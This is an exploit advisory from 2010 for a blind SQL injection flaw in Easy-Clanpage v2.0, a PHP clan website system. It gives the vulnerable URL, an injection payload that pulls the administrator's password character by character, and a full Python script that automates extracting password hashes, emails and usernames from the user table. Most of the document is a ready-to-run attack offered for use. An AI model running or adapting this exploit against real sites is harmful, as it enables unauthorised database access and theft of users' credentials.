----------------------------Information------------------------------------------------ +Name : Easy-Clanpage <= v2.0 Blind SQL Injection Exploit +Autor : Easy Laster +Date : 24.03.2010 +Script : Easy-Clanpage v2.0 +Download : http://www.easy-clanpage.de/?section=downloads&action=viewdl&id=12 +Demo : http://capu87.ca.funpic.de/ +Price : for free +Language : PHP +Discovered by Easy Laster +Security Group 4004-Security-Project +Greetz to Team-Internet ,Underground Agents +And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok, Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge, N00bor,Ic3Drag0n,novaca!ne. --------------------------------------------------------------------------------------- ___ ___ ___ ___ _ _ _____ _ _ | | | | | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___| _ |___ ___ |_|___ ___| |_ |_ | | | | |_ |___|_ -| -_| _| | | _| | _| | |___| __| _| . | | | -_| _| _| |_|___|___| |_| |___|___|___|___|_| |_|_| |_ | |__| |_| |___|_| |___|___|_| |___| |___| ---------------------------------------------------------------------------------------- +Vulnerability : http://localhost/ecp_version2/?section=user&action=details&func=stats&id= #BLind SQL Injection +Exploitable : http://localhost/ecp_version2/?section=user&action=details&func=stats&id= 1+and+1=1+and+ascii(substring((SELECT password FROM ecp_user+WHERE+userID=1 LIMIT 0,1),1,1))>1 ----------------------------------------------------------------------------------------- #Blind SQL Injection Exploit #!/usr/bin/env python #-*- coding:utf-8 -*- import sys, urllib2, getopt def out(str): sys.stdout.write(str) sys.stdout.flush() class Exploit: charset = "0123456789abcdefABCDEF" url = "" charn = 1 id = 1 table_prefix = "" table_field = "" passwd = "" columns = [] find_passwd = True def __init__(self): if len(sys.argv) < 2: print "*****************************************************************************" print "******************** Easy-Clanpage V2.0 Profil Page Hack ********************" print "*****************************************************************************" print "* Discovered and vulnerability by Easy Laster *" print "* coded by Dr.ChAoS *" print "*****************************************************************************" print "* Usage: *" print "* python exploit.py [OPTION...] [SWITCH...] *" print "* *" print "* Example: *" print "* *" print "* Get the password of the user with id 2: *" print "* python exploit.py -id 2 http://site.de/ecp/ *" print "* *" print "* Get email and username of id 1: *" print "* python exploit.py -columns 80:email,25:username -nopw http://site.de/ecp/ *" print "* *" print "* Switches: *" print "* --nopw Search no password *" print "* *" print "* Options: *" print "* --id= User id *" print "* --prefix= Table prefix of ECP *" print "* --columns= Get value of any column you want *" print "*****************************************************************************" exit() opts, switches = getopt.getopt(sys.argv[1:], "", ["id=", "prefix=", "columns=", "nopw"]) for opt in opts: if opt[0] == "--id": self.id = int(opt[1]) elif opt[0] == "--prefix": self.table_prefix = opt[1] elif opt[0] == "--columns": for col in opt[1].split(","): max, name = col.split(":") self.columns.append([max, name, ""]) elif opt[0] == "--nopw": self.find_passwd = False for switch in switches: if switch[:4] == "http": if switch[-1:] == "/": self.url = switch else: self.url = switch + "/" def generate_url(self, ascii): return self.url + "index.php?section=user&action=details&func=stats&id=1+and+1=1+and+ascii(substring((SELECT%20" + self.table_field + "%20FROM%20" + self.table_prefix + "ecp_user%20WHERE%20userID=" + str(self.id) + "%20LIMIT%200,1)," + str(self.charn) + ",1))%3E" + str(ord(ascii)) def start(self): print "Exploiting..." if self.find_passwd: self.password() if len(self.columns) > 0: self.read_columns() print "All finished!\n" print "------ Results ------" if len(self.columns) > 0: for v in self.columns: print "Column \"" + v[1] + "\": " + v[2] if self.find_passwd: if len(self.passwd) == 32: print "Password: " + self.passwd else: print "Password not found!" print "--------------------" def read_columns(self): end = False charrange = [0] charrange.extend(range(32, 256)) for i in range(len(self.columns)): out("Getting value of \"" + self.columns[i][1] + "\": ") self.table_field = self.columns[i][1] for pwc in range(1, int(self.columns[i][0]) + 1): if end == True: break self.charn = pwc end = False for c in charrange: src = urllib2.urlopen(self.generate_url(chr(c))).read() if "Warning: mysql_result() [" in src: if c == 0: end = True else: self.columns[i][2] += chr(c) out(chr(c)) break out("\n") def password(self): out("Getting password: ") self.table_field = "password" for pwc in range(1, 33): self.charn = pwc for c in self.charset: src = urllib2.urlopen(self.generate_url(c)).read() if "Warning: mysql_result() [" in src: self.passwd += c out(c) break out("\n") exploit = Exploit() exploit.start()